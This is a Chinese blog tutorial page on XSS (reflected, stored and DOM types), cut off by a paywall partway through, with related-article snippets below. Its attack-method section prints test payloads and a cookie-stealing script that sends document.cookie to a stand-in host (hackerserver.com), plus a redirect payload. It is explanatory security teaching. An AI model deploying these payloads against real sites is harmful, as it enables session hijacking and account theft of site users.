web漏洞之XSS

最新推荐文章于 2022-06-16 01:19:51 发布
最新推荐文章于 2022-06-16 01:19:51 发布
阅读量189 收藏
点赞数
分类专栏: web漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixi_5418/article/details/104791939
版权
本文详细介绍了XSS(跨站脚本攻击)的三种类型:反射型、存储型和DOM型XSS,包括攻击原理、方法、绕过手段、防御策略以及可能的危害,旨在帮助读者深入理解XSS攻击并提升网站安全性。
摘要由CSDN通过智能技术生成

目录

 

一 、XSS概述

1.1分类

二、反射型XSS

2.1攻击原理

2.2攻击方法

2.3绕过方法

2.4防御方法

2.5危害

三、存储型XSS

3.1攻击原理

3.2攻击方法

3.3绕过方法

3.4防御方法

3.5危害

四、DOM型XSS

4.1原理

4.2攻击方法

4.3防御方法

4.4危害

一 、XSS概述

       XSS是跨站脚本攻击(Cross Site Scripting),恶意攻击者往Web页面里插入恶意HTML语句或Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的

1.1分类

       XSS可以根据是否和后端或数据库交互分为两大类:持久性XSS(存储型)和非持久性XSS(反射型)

       反射型XSS:这种类型的XSS通常是一个页面(URL),它的攻击往往是一次性的,当被攻击者访问这个页面时,恶意代码就会被执行,从而达到攻击者的目的(弹cooking、页面劫持、钓鱼等)

       存储型XSS:这种xss用起来更为简单,攻击者的恶意语句和脚本会存储在服务器上面数据库中攻击行为将伴随着攻击数据一直存在。

       DOM型XSS:由于HTML页面中,定义了一段JS,根据用户的输入,显示一段 HTML 代码,攻击者 可以在输入时,插入一段恶意脚本,最终展示时,会执行恶意脚本。

二、反射型XSS

2.1攻击原理

  它通过我们给没有做任何防护或者防护不严格的网站插入html标签或script脚本来构造攻击页面,后端将解析后的页面和URL发送给攻击者,攻击者将URL发送给被害者,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起

2.2攻击方法

       1.确认是否存在xss:<script>alert(“xss”);</script>或者<img src='111' οnerrοr='alert("xss")'>

       2.弹cooking:var i=document.createElement("img");

        document.body.appendChild(i);

        i.src = "http://www.hackerserver.com/?c=" + document.cookie;

       3.页面跳转:<script>window.location.href="http://www.baidu.com";</script>

2.3绕过方法

       1.大小写关键字,复写等简单方法。比如:<

最低0.47元/天 解锁文章
Bin&R
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反射型XSS漏洞基础
Ethan024的博客
03-11 304
XSS漏洞基础(本文仅供技术学习与分享) 反射型XSS(GET)漏洞弹窗 实验准备: 皮卡丘靶场 实验步骤: 2. 确认页面是否存在XSS漏洞;在对应的输入点输入危险字符,括’, ", <, >以及危险字符串等; 3. 确认输入后是否会被过滤,输出是否会被处理; 4. 这里输入<>后,发现输入的字符串未被过滤或转义: 5. 查看源码发现,发现我们输入的<>被输出在标签里面: 6. 因此我们可以推测,如果输入JavaScript代码,也不会被过滤。因此输入简单的
跨站脚本攻击之反射型XSS漏洞
weixin_33813128的博客
06-23 163
如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息,就有可能会造成一种常见的XSS漏洞。一般情况下,这种页面使用一个含消息文本 的参数,并在页面加载时将文本返回给用户。对于开发者来说,使用这种方法非常方便,因为这样的解决方法可方便的将多种不同的消息返回状态,使用一个定制好 的信息提示页面。 例如,通过程序参数输出传递的参数到HTML页面,则打开下面的网址将会返回一个消息提示: htt...
反射型XSS漏洞
fencecat的博客
12-31 9312
实验项目 反射型XSS实验 综合性实验 2020年10月 22日 一、实验综述 1.实验目的及要求 (1)什么是XSS XSS,全称跨站脚本,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 (2)XSS分成两类: 一类是来自内部的,主要指的是利用程序自身的漏洞,构造跨站语句。 另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。 如当我们要一个站点,我们自己构造一个有跨站漏洞的网页...
反射型XSS漏洞的条件+类型+危害+解决
gb4215287的博客
02-04 2903
XSS攻击需要具备两个条件:需要向web页面注入恶意代码;这些恶意代码能够被浏览器成功的执行。 XSS攻击有2种: 反射型攻击; 存储型攻击 XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛、OA、CRM等社交...
漏洞:反射型 XSS 攻击
平凡的人类的博客
03-09 9213
什么是反射型 XSS 攻击? 反射型 XSS 是指应用程序通过 Web 请求获取不可信赖的数据,并在未检验数据是否存在恶意代码的情况下,将其发送给用户。反射型XSS一般可以由攻击者构造带有恶意代码参数的URL来实现,在构造的URL地址被打开后,其中含的恶意代码参数被浏览器解析和执行。这种攻击的特点是非持久化,必须用户点击含恶意代码参数的链接时才会触发。 实现目的: (其实说白了就类似于 SQL 注入,只不过一个是针对数据库,一个是针对 HTML ) 通过你提交的数据,实现反射型 XSS 可以..
web漏洞XSS_TEST漏洞实践练习代码
04-25
Web漏洞中的XSS(Cross Site Scripting)攻击是一种常见的安全问题,主要针对Web应用程序。XSS允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的会话、窃取敏感信息或者执行其他恶意操作。本资源"XSS_TEST漏洞...
95-web漏洞XSS漏洞挖掘.pdf
最新发布
03-15
95-web漏洞XSS漏洞挖掘
Web应用进行XSS漏洞测试
03-03
WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常含...
Web安全性测试之XSS
01-31
全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4068
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
反射型XSS漏洞详解
gb4215287的博客
02-04 2117
反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞。通常,该页面会使用一个含消息文本的参数,并在响应中将这个文 本返回给用户。对于开发者而言,使用这种机制非常方便,因为它允许他们从应用程序中调用一个定制的错误页面,而不需要对错误页面中的消息分别进行硬编码。 例如,下面的URL返回如图12-1所示的错误消息: https://wahh-app.co...
【学习笔记】Discuz 7.2 反射型xss漏洞
chualam的博客
11-01 230
xss黑盒测试 测试在referer=处插入数据 然后看源码 看看js等信息 如看到windows.location.href=‘’ 就要想到闭合引号 并且增加新增代码 记得用;隔开 settimeout其实用的是js的eval 白盒代码审计 find . -name '*.php' | xargs grep '你要找的函数' 主要判断函数上面成立条件的if语句 str_replace 对函数进行html进行编码操作 ...
XSS漏洞基础分析(反射型)
m0_55017965的博客
03-05 5112
攻击方法: 1.在自己地浏览器上发现xss漏洞,产生恶意行为 2.将输入命令后的url复制 3.发给其他用户,产生相同的攻击效果 在网页html中,出现Javascript语句即出现xss漏洞 源码分析: 低级代码:PHP代码中对xss语句没有任何过滤,可直接输入<script>alert(1234)</script> 源码分析: 中级代码:PHP代码中对xss语句有大小写有过滤,当xss语句为小写时,代码不能执行,所以可以将代码为大写: <sCri..
关于那些Web漏洞--XSS(反射型)
shawdow_bug的博客
06-16 106
反射型XSS原理
xss反射型post_XSS 跨站脚本攻击漏洞详解(反射型xss+储存型xss
weixin_42349126的博客
01-31 2176
XSS(Cross Site Scripting)简介:XSS 跨站脚本攻击(Cross Site Scripting),为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分作用叫XSS.反射型XSS的入侵过程:攻击者将含有恶意JavaScript代码的URL发给用户==>用户打开URL==>web应用程序对攻击者的JavaScript做出回应...
跨站脚本攻击之反射型XSS漏洞【转载】
weixin_30809173的博客
04-25 100
转载自FovWeb.com 如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息,就有可能会造成一种常见的XSS漏洞。一般情况下,这种页面使用一个含消息文本的参数,并在页面加载时将文本返回给用户。对于开发者来说,使用这种方法非常方便,因为这样的解决方法可方便的将多种不同的消息返回状态,使用一个定制好的信息提示页面。 例如,通过程序参数输出传递的参数到HTML...
XSS漏洞介绍及反射型XSS
热门推荐
weixin_44720762的博客
04-28 2万+
什么是XSS攻击: XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制–例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。 XSS分类: 类型A,本地利用漏洞,这种漏...
WEB漏洞深度剖析:SQL注入与XSS攻击
1. SQL注入:SQL注入是最常见的WEB漏洞之一,通常是由于动态SQL语句的不当拼接导致的。攻击者可以通过输入恶意的SQL代码来获取、修或删除数据库中的数据。例如,一个简单的注入攻击是利用"admin' or '=' '作为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值